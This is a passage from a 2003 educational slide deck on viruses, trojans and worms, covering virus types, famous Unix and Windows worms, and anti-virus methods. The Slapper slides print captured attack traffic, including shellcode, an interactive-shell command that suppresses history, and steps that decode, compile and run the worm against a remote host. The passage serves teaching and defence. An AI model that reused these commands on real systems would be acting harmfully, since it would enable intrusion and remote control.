Viruses, Worms, Trojans
advertisement
Software Security
Malware:
Trojans, Virii,
and Worms
A Subject Overview
Worms
SECURITY INNOVATION ©2003
Topics
•
•
•
General Definitions
– Viruses
– Trojans
– Worms
In depth info
– Viruses
– Trojans
– Worms
Anti Virus Technologies
SECURITY INNOVATION ©2003
Definitions
• Virus - code that copies itself into other programs.
• A “Bacteria” replicates until it fills all disk space, or CPU cycles.
• Payload - harmful things the malicious program does, after it has had
time to spread.
• Worm - a program that replicates itself across the network (usually
riding on email messages or attached documents (e.g., macro viruses).
• Trojan Horse - instructions in an otherwise good program that cause
bad things to happen (sending your data or password to an attacker
over the net).
• Logic Bomb - malicious code that activates on an event (e.g., date).
• Trap Door (or Back Door) - undocumented entry point written into code
for debugging that can allow unwanted users.
• Easter Egg - extraneous code that does something “cool.” A way for
programmers to show that they control the product.
SECURITY INNOVATION ©2003
Computer Viruses
(and other “Malicious Programs)
• Computer “Viruses” and related programs have the
ability to replicate themselves on an ever increasing
number of computers. They originally spread by
people sharing floppy disks. Now they spread
primarily over the Internet (a “Worm”).
• Other “Malicious Programs” may be installed by
hand on a single machine. They may also be built
into widely distributed commercial software
packages. These are very hard to detect before the
payload activates (Trojan Horses, Trap Doors, and
Logic Bombs).
SECURITY INNOVATION ©2003
Viruses
Viruses
SECURITY INNOVATION ©2003
What exactly is a Virus?
•
•
•
•
A term mistakenly applied to trojans and worms
Small program that negatively alters the way a computer works
Self replicating
Done without user knowledge or intervention
– still needs to be activated initially by the user
• There are over 60,000 Viruses, Trojans, and Worms today!
– Many are obsolete
– New viruses are more and more lethal
SECURITY INNOVATION ©2003
What a Virus isn’t – Common
Assumptions
•
•
•
•
•
•
Equipment Failure
Power surges/brownouts/spikes
Magnets (that 8” subwoofer next to your case)
Conflicting hardware drivers
Settings or other changes made by someone else (i.e. clueless techie)
Something made by Microsoft
SECURITY INNOVATION ©2003
Viruses - Beginnings
• First real virus called “Cloner” was written by 9th grader Rich Skrenta in
1982 for the Apple II,
It will get on all your disks
It will infiltrate your chips
Yes it's Cloner!
It will stick to you like glue
It will modify ram too
Send in the Cloner!
• First major PC virus was called “Brain”1 in 1986
• Came from two brothers running a computer store in Lahore, Pakistan
– Designed to prevent doctors from pirating their software by infecting
pirated copies
– “Infecting” only put a copyright notice in the program’s directory of floppy
disks
1 Although it was called The Brain virus it actually contained the authors phone numbers!
SECURITY INNOVATION ©2003
Viruses – Design Factors
•
•
•
Ultimate goal is to spread as far as possible (both on the box
and globally) before being wiped out
Infection and Detection are mutually limiting factors
The functional logic of an executable file virus is as follows:
• Search for a file to infect
–
–
–
–
Open the file to see if it is infected
If infected, search for another file
Else, infect the file
Return control to the host program
SECURITY INNOVATION ©2003
Viruses – Life Cycle
• Before it takes any action it reproduces itself
– Virus writers balance infection with detection
• On a defined trigger, it it modifies your system in some way
– Delete files, format drives,or shutdown programs
– Eat up system resources
– Alter data
SECURITY INNOVATION ©2003
Viruses – What’s with the names?
•
•
•
Names are determined by CARO
Each unique virus is given a family name
– Family names are derived from a quirk, the way it infects, or something
else unique to the virus
Each virus is further identified with prefixes and suffixes
–
•
•
•
Tells you what it does, how it infects
Variants of a virus are given a suffix of .A to .ZZZ
The naming of a virus follows the format
prefix “family name” suffix [suffix2, suffix3, …]
Example: W32.Bugbear@mm , one of the most lethal virus out there
– W32 : File infector/boot sector virus
– Bugbear : unique family name
– @mm : Mass Mailing distribution – use standard techniques and email to
distribute itself
•
Every virus can be uniquely identified by its signature as well
– binary representation of its machine code
SECURITY INNOVATION ©2003
Taxonomy of Malicious
Programs
Host
Program
Trapdoors
Logic
Bombs
Trojan
Horses
Independent
Viruses
SECURITY INNOVATION ©2003
Bacteria
Worms
Virus Phases
• Dormant - waits for a trigger to start replicating
• Propagation - copies itself into other programs of the same type
on a computer. Spreads when the user shares a file with another
computer. Usually searches a file for it’s own signature before
infecting.
– Worms (like Melissa) spread over a network connection as
executable attachments to email.
• Triggering - starts delivering payload. Sometimes triggered on a
certain date, or after a certain time after infection.
• Execution - payload function is done. Perhaps it put a funny
message on the screen, or wiped the hard disk clean. It may
become start the first phase over again.
SECURITY INNOVATION ©2003
Types of Viruses
• Parasitic Virus - attaches itself to executable files as part of their
code. Runs whenever the host program runs.
• Memory-resident Virus - Lodges in main memory as part of the
residual operating system.
• Boot Sector Virus - infects the boot sector of a disk, and spreads
when the operating system boots up (original DOS viruses).
• Stealth Virus - explicitly designed to hide from Virus Scanning
programs.
• Polymorphic - Virus - mutates with every new host to prevent
signature detection.
SECURITY INNOVATION ©2003
Viruses – are there “Good” ones?
Possible ideas for a “good” virus are:
• An Anti-Virus Virus
– Find other viruses and kill them
• File Compressor Virus
– Compresses the file it infects
• Encryption Virus
– Infects boot sector and encrypts the disk with a user supplied
password
• Maintenance Virus
– Traverse a network and perform maintenance functions on
individual machines
SECURITY INNOVATION ©2003
Viruses – are there “Good” ones?
“Good” viruses won’t succeed for many reasons
• Technical
– Lack of control
– Recognition difficulty (a virus is still a virus)
– Wasting resources
– Containment
– Compatibility problems
• Legal and Ethical
– Unauthorized data modification
– Copyright and ownership problems
– Misuse
– Responsibility – “It was just research”, “You were sharing
copyrighted files anyways”
SECURITY INNOVATION ©2003
Viruses – are there “Good” ones?
• Psychological
– Trust Problems
• People like having total control of their system
– Negative common meaning
• Its still a virus
• Would you buy a car that was called “Doesn’t Move”?
– (ex. Chevy Nova)
SECURITY INNOVATION ©2003
Virus Characteristics
• Boot sector
– Can’t infect across networks due to protocol
restrictions
• Multipartite
– Combination of Boot Sector and File
Infector…therefore, this type can spread over
networks. Very nasty.
• Stealth
– Hides its signature through various means, such as
encryption. Also, by “Polymorphic” means.
SECURITY INNOVATION ©2003
Viruses – Classification by
Infection Targets
• System sector/Boot viruses
– Infect the system sectors of disks & hard drives
• File/Parasitic viruses
– .COM and .EXE files, most typical
• Batch file & Macro viruses
– Use text batch files or Word/Excel macros
• Cluster viruses
– Infect the directory structures
• Companion/Spawn viruses
– Adds infected file to system startup
• Source code viruses
– Add additional code to program source code
• VB Script viruses
– Use Windows Scripting Host to control the machine
SECURITY INNOVATION ©2003
Viruses – System Sector/Boot
Viruses
• Share infecting the most machines with Macro viruses
• Infect the master boot record (MBR) or boot sector of disks
• Useful to virus writers because this area of the disk is invisible to the
user
• Area of disk is small (512 bytes), so viruses store the actual virus
somewhere else on the disk and mark it as bad in the MBR
– Do this to avoid being detected by system scans
• Some Mac viruses infect upon the disk being inserted
SECURITY INNOVATION ©2003
Viruses – System Sector/Boot
Viruses
• System Sector Viruses
– Stealth Component
• Memory resident viruses of this type can foil sector editing
programs by reporting back a saved copy of the original
overwritten blocks
– Multiple Part
• Infect both system sectors and files
– Infected files drop the virus on infected systems
SECURITY INNOVATION ©2003
Viruses – Batch File Viruses
• Are .BAT script files that contain assembly code within them
• Utilizes a special handle in batch scripting that tells it to interpret the
commands after it as assembly
• Can run payload themselves, or can create a separate file and run it
SECURITY INNOVATION ©2003
Macro Viruses
• Microsoft Office applications allow “macros”
to be part of the document. The macro could
run whenever the document is opened, or
when a certain command is selected (Save
File).
– Targets particular data files
– Uses application’s macro interpreter
• A macro virus can delete files, generate email,
edit letters, or mail itself to everyone on
internal mail-address lists.
SECURITY INNOVATION ©2003
Viruses – Macro Viruses
• Regular data files did not propagate viruses
– Viruses had to be executed manually and loaded into
memory
• Programs such as the Microsoft Office Suite incorporated macros
with regular data files
– Macros are run upon loading the file and infect the system
• Plain-text email with macro attachments can be automatically
run upon opening or previewing the message
– Bubbleboy (actually a worm) did this
• Melissa - the first virus to be both a Word macro virus and to use
the Outlook express address book
• Tristate – macro virus that infected Word, Excel, and PowerPoint
SECURITY INNOVATION ©2003
Viruses – File (Parasitic)
Viruses
• Locate and infect .EXE .COM .OVL .DLL files
• Overwrite part of the program’s code with a copy of itself
• Are not as widespread as system sector and macro viruses
SECURITY INNOVATION ©2003
Viruses – File (Parasitic)
Viruses
• Simple File Viruses
– After transplanting
itself in the
executable, the
executable often
doesn’t work
• Stealth Component
– Work very similar
to stealth system
sector viruses
• Mask the file size of
infected files when a
directory listing is
done on them
SECURITY INNOVATION ©2003
File Infectors
• Must be executed to spread or deliver
payload.
• Payloads may be event-driven (Logic/Time
Bomb).
• Resident viruses remain in memory to infect
programs as they are run.
• May spread my many means:
–
–
–
over networks,
from diskettes (sneaker-net),
from downloads.
SECURITY INNOVATION ©2003
File Infectors
.COM
Start
End
Prepended virus
(.COM)
Start
Appended virus
(.COM & .EXE)
Jump
End
= virus code
= program flow
End
SECURITY INNOVATION ©2003
Viruses – Cluster Viruses
• Infect directory information in the file system
rather than the file
– When user tries to run the program, the virus is
ran instead
– To remain stealth, the virus then locates the file
and runs it
• If you boot without the virus in memory
utilities will report serious problems with the
file system
– allowing the utility to fix them will it will erase
programs in the infected directories
SECURITY INNOVATION ©2003
Viruses – Companion/Spawn
Viruses
• Legacy virus – take advantage of the way DOS
executes .COM files before .EXE files
– Infects by making a .COM file with the same name as a .EXE
– Relies on most users omitting prog.exe when typing a
command
• This method and the cluster method are the only
ways viruses can infect files without modifying them
SECURITY INNOVATION ©2003
Viruses – Source Code and VB
Script Viruses
• Source code viruses seek out source code on an infected
computer and add additional malicious code to it
– Not very popular
• Not many people program/compile code on their computer
• VB Script viruses are extremely popular because everyone
running IE5 or higher can become infected
– Allows rogue code to execute arbitrary commands on your
system
– Ex: Many VB script viruses email themselves in outlook &
outlook express just like worms do
SECURITY INNOVATION ©2003
VBS Viruses
• ILoveYou Virus
– E-mail attachment in “VBS”.
– Attempts to spread to default Outlook address
book contacts
– Installs a password-grabbing program,
forwarding to an Online Chat Room
– Overwrites some files
SECURITY INNOVATION ©2003
Viruses – by Infection Methods
•
•
•
•
•
•
•
•
•
•
Polymorphic Viruses
Metamorphic
Stealth Viruses
Fast and Slow infections
Sparse Infectors
Armored Viruses
Multipartite Viruses
Cavity Viruses
Tunneling Viruses
NTFS Stream Viruses
SECURITY INNOVATION ©2003
Viruses - Polymorphic
• Polymorphic viruses change with each infection
• Polymorph/Mutation engines allow virus authors to make their
virus polymorphic automatically
• Simple polymorph engines insert “NOPS” into the assembly
code of a virus
– Very easy to detect
• Other simple polymorphic viruses can encrypt themselves with
random keys
• More complex mutation engines insert junk code into the virus
– Junk code must not interfere with the real executing code!
• Ideal polymorph engines for authors would create a truly unique
virus every time
SECURITY INNOVATION ©2003
Viruses – Metamorphic
• Change virus structure and decryption engine to
evade signature matching
– Example – W32,Simili virus
•
•
•
•
Creates a copy from the decrypted virus
Takes out unused and extraneous code to get a “Core Virus”
Re-mutates the virus by moving and splitting functions
Adds extra unused/redundant code and modified decryption
engine
SECURITY INNOVATION ©2003
Viruses – Stealth
• In order to infect a system the virus must make some changes to
the system
• Stealth viruses are memory resident viruses that act as a
blindfold to system processes
• Used to avoid detection and examination by the system
• Utilized by many viruses:
– File – return the original size of infected file when queried
– Cluster – run the virus first, then run the user’s intended
program
– System Sector/Boot – report bad blocks on disk where virus
is located
SECURITY INNOVATION ©2003
Viruses – Fast/Slow Infectors
• Come from different methods of infection
– Fast infector – spreads fast, doesn’t care about detection
– Slow infector – spread randomly, avoids detection
• Fast infector – infect when a file is accessed/run
– Takes advantage of anti-virus scans
• Scanner opens up every file
• Fast infector infects the recently opened file
• Slow infector – infect when a file is created/modified
– Try to “defeat integrity checking software by piggybacking
on top of the process which legitimately changes a file”
SECURITY INNOVATION ©2003
Viruses – Sparse, Armored, and
Multi Part Viruses
• Sparse infectors aim to be widespread and undetected
– Use a variety of techniques to infect & remain undetected
such as:
• Infect every Nth time a file is accessed
• Every file with a specific string
• Every time a specific keystroke occurs
• Armored viruses use special tricks to make the tracing,
disassembling, and understanding of their code more difficult. 1
– Do this by attempting to confuse the virus scanner trying to
find its exact location among other tricks
• Multi Part viruses are a combination of system sector and file
infector viruses
1
http://kb.indiana.edu/data/aehs.html
SECURITY INNOVATION ©2003
Viruses – Cavity Viruses
• Cavity viruses exploit gaps in program files
and insert themselves inside, similar to a
typical file virus
– A new windows file format called the “Portable
Executable” designed to decrease load times, has
many blank gaps inside the file
• File/Parasitic Viruses are similar to cavity
viruses but are not as crafty
• Both types of viruses use some kind of stealth
protection as well
SECURITY INNOVATION ©2003
Viruses – Tunneling Viruses
• Tunneling viruses strip hardware interrupts of any
programs monitoring redirection
– Enables viruses to go undetected and infect other programs
• This same method is used by anti-virus programs as
well to prevent being detected by viruses upon load
• Tunneling viruses can get into a “war” with the antivirus program over who will be in control of
interrupts
SECURITY INNOVATION ©2003
Viruses – NTFS Alternate Data
Streams
• NTFS partitions can store data in a file and not
increase the size whatsoever
• Data is invisible to normal system tools and programs
• You can clean a file manually by copying it to another
file system (one that is not formatted NTFS) and back
again
SECURITY INNOVATION ©2003
Virus Detection
• 1st Generation, Scanners: searched files for any of a library of
known virus “signatures.” Checked executable files for length
changes.
• 2nd Generation, Heuristic Scanners: looks for more general signs
than specific signatures (code segments common to many
viruses). Checked files for checksum or hash changes.
• 3rd Generation, Activity Traps: stay resident in memory and
look for certain patterns of software behavior (e.g., scanning
files).
• 4th Generation, Full Featured: combine the best of the techniques
above.
SECURITY INNOVATION ©2003
Anti-Virus Technologies
• Scanners
– Interceptors
– Disinfectors
– Heuristics
•
•
•
•
•
•
Inoculators
Integrity Checkers
Safe Computing (aka Common Sense)
NBAR/QoS
Eicar test string
Anti-Virus Packages
SECURITY INNOVATION ©2003
Anti-Virus Technologies
Scanners
•
•
•
•
Scanners consist of a twofold method of protection
– File scanning
– Background Checking (interceptors)
Check for viruses by analyzing for virus signatures
– Works on known viruses that are unencrypted
– Unknown viruses can be detected by monitoring activity
• False alarms issued
• New technologies are improving this
– Only as good as the last update
Speed up scanning in various ways (part of heuristics)
– by only scanning .EXEs for file viruses, boot sectors for boot viruses, etc
– algorithms to scan only sections of the file rather than the whole
Disinfectors are also built into any reputable scanner
– Can remove a virus from a file, but often cannot do so without damaging the file
– If files cannot be disinfected safely, they can be quarantined
– Still does not mean your system is safe
SECURITY INNOVATION ©2003
Anti-Virus Technologies
Scanners
• Check for viruses by using Heuristics
– 70-80% Success rate
– Unknown viruses can be detected
• Look at characteristics of a file – determine probability of being
infected
• Can find and stop some new viruses from executing
– Used to find viruses without signatures (Metamorphic Viruses)
• These viruses expand/contract in size
• Use encryption as well
– Use a point system to detect
• Certain actions get a certain amount of points
• If enough points accumulated, then scanner is set off
– Can be applied for what viruses not to scan
SECURITY INNOVATION ©2003
Anti-Virus Technologies
Inoculators
• Mark sectors and files as infected in the usual spot where viruses look
– Doesn’t anymore work today
• Make programs self-checking
– Insert code at beginning of program to compare generated data (by
the code) to stored data
• Can be circumvented by stealth viruses
• Check Code/Stored Code can be modified
• Sets off alarms for interceptors
• Prevents some programs from working
SECURITY INNOVATION ©2003
Anti-Virus Technologies
Integrity Checkers
• Viruses infect/attack by making changes to the system
• Integrity checkers monitor system changes
– Initially scans disk and records a unique “signature” for all files and
partitions
– Can alert the user of a virus when certain changes are made
– Allow you to see what damage has been done by a virus
– Ideally can be used to detect unknown viruses
• Things holding integrity checkers back
– Must be combined with a good scanner – Stand alones don’t work
– Scanners that incorporate these checkers don’t incorporate them
effectively
• Not checking enough changes
– Some checkers are slow and unwieldy
• Can also be implemented in detecting system break ins
SECURITY INNOVATION ©2003
Anti-Virus Technologies
Common Sense!
• Do not leave a floppy disk in the floppy disk drive when you shut
down or restart the computer
• Write-protect your floppy disks after you have finished writing to them
• Be suspicious of email attachments from unknown sources
• Verify that attachments have been sent by the author of the email.
Newer viruses can send email messages that appear to be from people
you know
• Do not set your email program to "auto-run" attachments or auto
preview
• Obtain all Microsoft security updates
• Back up your data frequently. Keep the (write protected) media in a safe
place--preferably in a different location than your computer
• Disable windows scripting host
• Look at extensions – megadeth_song.exe, familyvacation.com
• Watch out for double extensions – corvette.jpg.exe
SECURITY INNOVATION ©2003
Anti-Virus Technologies
NBAR/QoS
• You can use Cisco’s Network Based Application Recognition (a QoS
feature included in their latest routers) to get rid of code red
• Setup HTTP filter by URL with text string unique to virus
• Attach it to its own class map
• Attach class map with policy map
• Set DSCP to 1 (usually not used in a configuration)
• Block Code red attempts with an ACL
SECURITY INNOVATION ©2003
Anti-Virus Technologies
EICAR Group
• EICAR test string is not a real virus
• Used in testing & development of anti-virus software
• Looks similar to the following:
%^$#!FP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TESTFILE!$H+H*
• EICAR’s Mission statement:
“EICAR combines universities, industry and media plus technical,
security and legal experts from civil and military government and law
enforcement as well as privacy protection organizations whose objectives
are to unite efforts against writing and proliferation of malicious code
like computer viruses or Trojan Horses, and, against computer crime,
fraud and the misuse of computers or networks, inclusive malicious
exploitation of personnel data, based on a code of conduct. “
SECURITY INNOVATION ©2003
Anti-Virus Technologies
Packages
• Norton Antivirus
– Corporate edition includes many remote administration features
•
•
•
•
Dr. Solomon’s
McAfee
Sophos
Many, many others
SECURITY INNOVATION ©2003
Worms
Okay, So Then What’s a Worm?
• Similar to a virus, but propagates itself through the Internet by breaking
into machines
• Main goal is to bring down and deny access to networks and services
• Does not rely on user intervention
• Does not rely on being transmitted physically (i.e. by disk)
• Does not rely on being emailed or transferred by the user – does it by itself
SECURITY INNOVATION ©2003
Why Worms?
• Ease
– write and launch once
– many acquisitions
– continually working
• Pervasiveness
– weeds out weakest targets
– penetrates difficult networks
SECURITY INNOVATION ©2003
Worms
• A worm is a self propagating piece of malicious
software. It attacks vulnerable hosts, infects them,
then uses them to attack other vulnerable hosts
• “Famous” Worms
– Morris Internet worm (1988)
– Currently:
• Ramen Worm
• Lion worm
• Adore Worm
• Code Red
• Nimda
SECURITY INNOVATION ©2003
Worms
• Who Writes Them
– Hacker/Crackers
– Researchers
– Virus Writers
SECURITY INNOVATION ©2003
Worms
• Worms vs. Viruses
–
–
–
–
Viruses require interaction
Worms act on their own
Viruses use social attacks
Worms use technical attacks
SECURITY INNOVATION ©2003
Worms at a Glance
•
•
•
•
Main goal is to disrupt network and deny access
Many shut down anti-virus and firewall applications
Not concerned about detection
1988 – Shut down 3,000-6,000 computers (5-10% of the
Internet)
• Growing trend of worms making the headlines rather
than true viruses
– Code Red
– Nimda
– Opaserv
SECURITY INNOVATION ©2003
The Worm’s Beginnings
• John Shoch invented the concept at Xerox’s Palo Alto
research labs in 1978
• Designed as a useful tool that borrowed clock cycles
from idle CPUs
• Actually got out of control back then as well
SECURITY INNOVATION ©2003
Morris Internet Worm
On November 2, 1988, Robert Morris, Jr., a graduate student in
Computer Science at Cornell, wrote an experimental, self-replicating,
self-propagating 99 line program called a worm and injected it into the
Internet. He chose to release it from MIT to disguise the fact that the
worm came from Cornell. Morris soon discovered that the program was
replicating and infecting machines at a much faster rate than he had
anticipated---there was a bug. Ultimately, many machines at locations
around the country either crashed or became ``catatonic.'' When Morris
realized what was happening, he contacted a friend at Harvard to
discuss a solution. Eventually, they sent an anonymous message from
Harvard over the network, instructing programmers how to kill the
worm and prevent re-infection…The estimated cost of dealing with the
worm at each installation ranged from $200 to more than $53,000.
SECURITY INNOVATION ©2003
How it Didn’t Bring 6,000
Machines Down
• The worm didn't alter or destroy files
• The worm didn't save or transmit the passwords which it cracked
• The worm didn't make special attempts to gain root or superuser access
in a system (and didn't utilize the privileges if it managed to get them)
• The worm didn't place copies of itself or other programs into memory
to be executed at a later time. (Such programs are commonly referred to
as timebombs)
• The worm didn't attack machines other than Sun 3 systems and VAX
computers running 4 BSD Unix (or equivalent)
• The worm didn't attack machines that weren’t attached to the internet
• The worm didn't travel from machine to machine via disk
• The worm didn't cause physical damage to computer systems
SECURITY INNOVATION ©2003
How it Did Take 10% of the Net
Down
• Utilized a variety of Unix security holes
– Sendmail remote debug
• Allowed the worm to execute remote commands on the system
– Obtained user lists
• Ran dictionary attack of 432 “common” passwords on user lists
• Most passwords today are as insecure as 1988
SECURITY INNOVATION ©2003
How the First Worm Changed
System Administration
• File access should be limited (the worm could open the encrypted
password file)
• Networks should use a conglomerate of OSes
– i.e. a UNIX virus won’t infect a Win2k server
• Brought about forums of geeks (Us) for sharing research
• Beware of reflexes! Many S.A.’s shut down sendmail to stop the virus,
but only delayed information on how to patch & fix it
• Logs are monotonous but are extremely useful in troubleshooting
SECURITY INNOVATION ©2003
Internet Worms
• First worms were actually designed and
released in the 1980’s
• Worms were non-destructive and generally
were released to perform helpful network
tasks
– Vampire worm: idle during the day, at night
would use spare CPU cycles to perform complex
tasks that required the extra computing power
SECURITY INNOVATION ©2003
Internet Worms
• Eventually negative aspects of worms came to
light
– An internal Xerox worm had crashed all the
computers in a particular research center
– When machines were restarted the worm repropagated and crashed the machines again
SECURITY INNOVATION ©2003
Six Components of Worms
•
•
•
•
•
•
Reconnaissance
Specific Attacks
Command Interface
Communication Mechanisms
Intelligence Capabilities
Unused and Non-attack Capabilities
SECURITY INNOVATION ©2003
Reconnaissance
• Target identification
• Active methods
– scanning
• Passive methods
– OS fingerprinting
– traffic analysis
SECURITY INNOVATION ©2003
Specific Attacks
• Exploits
– buffer overflows, cgi-bin, etc.
– Trojan horse injections
• Limited in targets
• Two components
– local, remote
SECURITY INNOVATION ©2003
Command Interface
• Interface to compromised system
– administrative shell
– network client
• Accepts instructions
– person
– other worm node
SECURITY INNOVATION ©2003
Communications
• Information transfer
• Protocols
• Stealth concerns
SECURITY INNOVATION ©2003
Intelligence Database
• Knowledge of other nodes
• Concrete vs. abstract
• Complete vs. incomplete
SECURITY INNOVATION ©2003
UNIX Worms
•
•
•
•
•
•
•
Ramen Worm (01/2001)
Lion Worm (02/2001)
Adore Worm (04/2001)
Cheese Worm (05/2001)
Sadmind Worm (05/2001)
Scalper Worm (07/2002)
Slapper Worm (09/2002)
SECURITY INNOVATION ©2003
Ramen Worm
• First discovered in January of 2001
• Attacks RedHat Linux 6.2, 7.0 systems
• The worm randomly selects a class B address
and attempts to use well known exploits
against rpc.statd, wu-ftpd and LPRng to gain
access
SECURITY INNOVATION ©2003
Ramen Worm: Detection
• If you’re running a web server, the worm
replaces your index.html with
click
• Starts a http daemon on tcp port 27374 for
newly infected hosts to download code
SECURITY INNOVATION ©2003
Ramen Worm: Added feature
• Note: The worm patches the holes it used to
gain access so no other system cracker can get
in. (Isn’t that nice of them!)
SECURITY INNOVATION ©2003
Lion Worm
• Exploits weakness in BIND to gain root access
• Listens on port 27374
• Sends out email to huckit@china.com with
/etc/passwd, /etc/shadow and network
settings
• Randomly generates class B network
addresses to scan
• Scans network for exploitable hosts
SECURITY INNOVATION ©2003
Lion Worm
• Once it exploits a host, it installs the t0rn root
kit.
• Ports 60008/tcp and 33567/tcp get bound to a
backdoor root shell
• A trojaned version of SSH gets bound to
33568/tcp
SECURITY INNOVATION ©2003
Adore Worm
• First appeared around April 1, 2001
• Similar to Ramen and Lion
• Exploits BIND, rpc.statd, LPRng on Redhat
Linux systems
• Emails information, including /etc/passwd to
a few different email addresses
SECURITY INNOVATION ©2003
Cheese Worm
• The 'cheese worm' is a worm designed to remove all
inetd services referencing '/bin/sh' from systems
with root shells listening on TCP port 10008 a
signature of the li0n worm. Although this can be seen
as a self-spreading patch, in reality, the 'cheese worm'
will attempt to execute a series of shell commands on
any host which accepts TCP connections on TCP port
10008.
• The 'cheese worm' perpetuates its attack cycle across
multiple hosts by copying itself from attacking host to
victim host and self-initiating another attack cycle.
Thus, no human intervention is required to
perpetuate the cycle once the worm has begun to
propagate.
SECURITY INNOVATION ©2003
sadmind/IIS Worm
• The worm uses two well-known vulnerabilities to compromise
systems and deface web pages.
• Sadmind/IIS propagates using a buffer overrun exploit on
Solaris systems in the sadmind program, part of the Solstice
AdminSuite.
• After successfully compromising the Solaris systems, it uses the
“Web Server Folder Directory Traversal" vulnerability to
compromise the IIS systems.
• When the worm attacks a system it will append the text "+ +" to
the .rhosts file belonging to root. It will then copy the worm to
the new machine and extract into a new /dev/cuc directory.
/etc/rc.d/S71rpc will be changed so the worm is started when
the system is started and then that file will be run to make the
worm active immediately.
SECURITY INNOVATION ©2003
Sadmind Worm
SECURITY INNOVATION ©2003
Scalper Worm
• This worm spreads over Apache web servers on
FreeBSD by using the Chunked Encoding exploit.
• It first sends an ordinary request to the server. If it
gets a reply back saying that the server is Apache it
will send the exploit regardless of the target server
being vulnerable or not. The worm appears to give an
attacker remote control abilities, including DDoS
capability.
• Each worm installation keeps in memory a list of all
the IPs infected from it so that all infected servers are
connected in a tree like fashion.
SECURITY INNOVATION ©2003
Slapper Worm
• Slapper is a improved version of the Linux/FreeBSD Scalper
worm. Slapper is using the OpenSSL mod_ssl exploit discovered
in August, 2002.
• The Slapper worm scans for vulnerable systems on 80/tcp using
an invalid HTTP GET request. Once infected, the victim server
begins scanning for additional hosts to continue the worm's
propagation.
• Additionally, the Slapper worm can act as an attack platform for
distributed denial-of-service (DDoS)
– (UDP, Tcp and IPv6 floods)
• Potentially destructive (corrupts data while replicating)
• Slapper did take a big evolutionary step by creating a peer-topeer network.
• Considered a hint of what future cyberweapons may look like
SECURITY INNOVATION ©2003
Slapper Get Request
68.168.1.15:52160 -> 127.0.0.1:80
GET / HTTP/1.1....
127.0.0.1:80 -> 68.168.1.15:52160 :52160
HTTP/1.1 400 Bad Request..Date: Sun, 22 Sep 2002 03:41:10
GMT..Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4
OpenSSL/0.9.6b DAV/1.0.2 PHP/ 4.0.6 mod_perl/1.24_01..Connection:
close..Transfer-Encoding: chunked..Content-Type:
text/html;
+
charset=iso-8859-1....169..<!DOCTYPE HTML PUBLIC "-//IETF//DTD
HTML 2.0//EN">.<HTML><HEAD>.<TITLE>400 Bad quest</TITLE>. </HEAD>
<BODY>.<H1>Bad Request</H1>.Your browser sent a request that this
server could not understand.<P>.client sent HTTP/1.1 request
without hostname (see RFC2616 section 14.23): <P>. <HR>.
<ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port
80</ADDRESS>.</BODY></HTML>...0....
SECURITY INNOVATION ©2003
The Attack
68.168.1.15:52312 -> 127.0.0.1:443
...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9.................hjE.H.o.,B...."Oo...:.....'...i..%._~...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G
@AAAA............AAAAAAAA....................................1...
.w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A
..1...Q[....1.Ph//shh/bin..PS.......
[..]
68.168.1.15:52312 -> 127.0.0.1:443
export TERM=xterm;export HOME=/tmp;export
HISTFILE=/dev/null; export
PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.
SECURITY INNOVATION ©2003
Compiling and Installing
68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c
/tmp/httpd /tmp /update /tmp/.unlock; .cat > /tmp/.unlock.uu <<
__eof__; .begin 655 .unlock
[worm source code, in uuencoded format, omitted]
68.168.1.15:52312 -> 127.0.0.1:443
uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock C /tmp/;gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o
/tmp/update /tmp/.update.c;./tmp/httpd 68.168.1.15; /tmp/update;
.
68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c
/tmp/update; exit; .
SECURITY INNOVATION ©2003
/tmp/httpd
Remote Communications
127.0.0.1.4156 > 68.168.1.15.4156:
0x0000
0x0010
0x0020
udp 28 (DF)
4500 0038 0000 4000 4011 beb3 XXXX XXXX
YYYY YYYY 103c 103c 0024 92cb 0000 0000
8fff 0000 25b8 aaa8 7000 0000 0000 0000
^^
obs: XXXX XXXX == localhost IP
YYYY YYYY == worm_host IP
0x70
== Incomming client flag
SECURITY INNOVATION ©2003
E..8..@.@.......
...'.<.<.$......
....%...p.......
Worm Propagation
• Central Source Propagation
– This type of propagation involves a central
location where after a computer is infected it
locates a source where it can get code to copy into
the compromised computer then after it infects the
current computer it finds the next computer and
then everything starts over again. And example of
the this kind of worm is the 1i0n worm.
SECURITY INNOVATION ©2003
Worm Propagation
• Back-Chaining Propagation
– The Cheese worm is an example of this type of
propagation where the attacking computer
initiates a file transfer to the victim computer.
After initiation, the attacking computer can then
send files and any payload over to the victim
without intervention. Then the victim becomes the
attacking computer in the next cycle with a new
victim. This method of propagation is more
reliable then central source because central source
data can be cut off.
SECURITY INNOVATION ©2003
Worm Propagation
• Autonomous Propagation
– Autonomous worms attack the victim computer
and insert the attack instructions directly into the
processing space of the victim computer which
results in the next attack cycle to initiate without
any additional file transfer. Code Red is an
example of this type of worm. The original Morris
worm of 1988 was of this nature as well.
SECURITY INNOVATION ©2003
Windows Worms
• Code Red
• Nimda
SECURITY INNOVATION ©2003
Windows Worms
• Code Red infected over 250,000 systems in 9
hours on July 19, 2001.
• NIMDA and Code Red worms cost business 3
- 4 billion dollars.
SECURITY INNOVATION ©2003
W32/Bady.worm (Code Red)
Infection
• Exploits the buffer overflow vulnerability
associated with “idq.dll". idq.dll provides
support for internet data administrative script
files ".ida" and internet data queries files ".idq"
for indexing server 2.0 and indexing services.
• The malicious code is not saved as a file, but is
inserted into and then run directly from
memory.
• Static worm
SECURITY INNOVATION ©2003
W32/Bady.worm (Code Red)
Propagation
• If the file C:\Notworm does not exist, then
new threads are created. If the date is before
the 20th of the month, the next 99 threads
attempt to exploit more computers by
